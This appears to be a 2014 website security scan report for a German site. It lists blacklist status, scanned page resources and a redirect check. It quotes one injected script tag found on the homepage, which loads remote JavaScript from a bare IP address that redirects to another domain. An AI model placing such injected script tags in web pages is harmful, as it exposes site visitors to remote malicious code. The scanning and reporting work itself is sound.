Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web.servicezentrum-jog.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web.servicezentrum-jog.de/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://web.servicezentrum-jog.de/ | 200 OK Content-Length: 7437 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://79.96.143.122/new/rel.php?id=7968142"></script> | ||
http://79.96.143.122/new/rel.php?id=7968126 | HTTP/1.1 301 Moved Date: Thu, 02 Oct 2014 09:40:12 GMT Location: http://logosau.eu/rel.php?id=7968126 Server: IdeaWebServer/v0.80 Content-Length: 192 Content-Type: text/html | clean |
http://logosau.eu/rel.php?id=7968126 | 200 OK Content-Length: 32322 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.4.4.min.js?ver=3.5.1 | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js?ver=3.5.1 | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/hoverIntent.js?ver=3.5.1 | 200 OK Content-Length: 3174 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/superfish.js?ver=3.5.1 | 200 OK Content-Length: 3710 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/css_browser_selector.js?ver=3.5.1 | 200 OK Content-Length: 1321 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/jquery.nivo.slider.pack.js?ver=3.5.1 | 200 OK Content-Length: 15809 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/kt_nivohomepage.js?ver=3.5.1 | 200 OK Content-Length: 1567 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/masonry.js?ver=3.5.1 | 200 OK Content-Length: 8300 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/kt_nivoportfolio.js?ver=3.5.1 | 200 OK Content-Length: 7797 Content-Type: application/javascript | clean |
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js?ver=3.5.1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 02 Oct 2014 09:40:16 GMT Via: 1.1 1228e077cd8e3d045c8d3f88beaa5abd.cloudfront.net (CloudFront) Location: https://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js?ver=3.5.1 Server: CloudFront Content-Length: 183 Content-Type: text/html X-Amz-Cf-Id: 2VXiDxElCICb4q4heBYH5c7lgzZJO9DCqroAjHIjpXG7BzA7NmoXpA== X-Cache: Redirect from cloudfront | clean |
https://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js?ver=3.5.1 | 403 Forbidden Content-Length: 243 Content-Type: application/xml | clean |
http://cloud.github.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 02 Oct 2014 09:40:17 GMT Via: 1.1 4270faf2ddda87dd57c4102c07d61fc7.cloudfront.net (CloudFront) Location: https://cloud.github.com/test404page.js Server: CloudFront Content-Length: 183 Content-Type: text/html X-Amz-Cf-Id: VX-JKRgchFpGavTF0wBRi5VoTVIr2Kh0MLPMGfSaxmuWLuNaRJdPFg== X-Cache: Redirect from cloudfront | clean |
https://cloud.github.com/test404page.js | 403 Forbidden Content-Length: 243 Content-Type: application/xml | clean |
http://logosau.eu/wp-content/themes/kaytee/js/kt_cycle.js?ver=3.5.1 | 200 OK Content-Length: 50893 Content-Type: application/javascript | clean |
http://logosau.eu/wp-content/themes/kaytee/js/kt_imgscroller.js?ver=3.5.1 | 200 OK Content-Length: 5524 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web.servicezentrum-jog.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 09:40:12 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: web.servicezentrum-jog.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 09:40:12 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: web.servicezentrum-jog.de
Referer: http://www.google.com/search?q=web.servicezentrum-jog.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: web.servicezentrum-jog.de
Referer: http://www.google.com/search?q=web.servicezentrum-jog.de
Result:
The result is similar to the first query. There are no suspicious redirects found.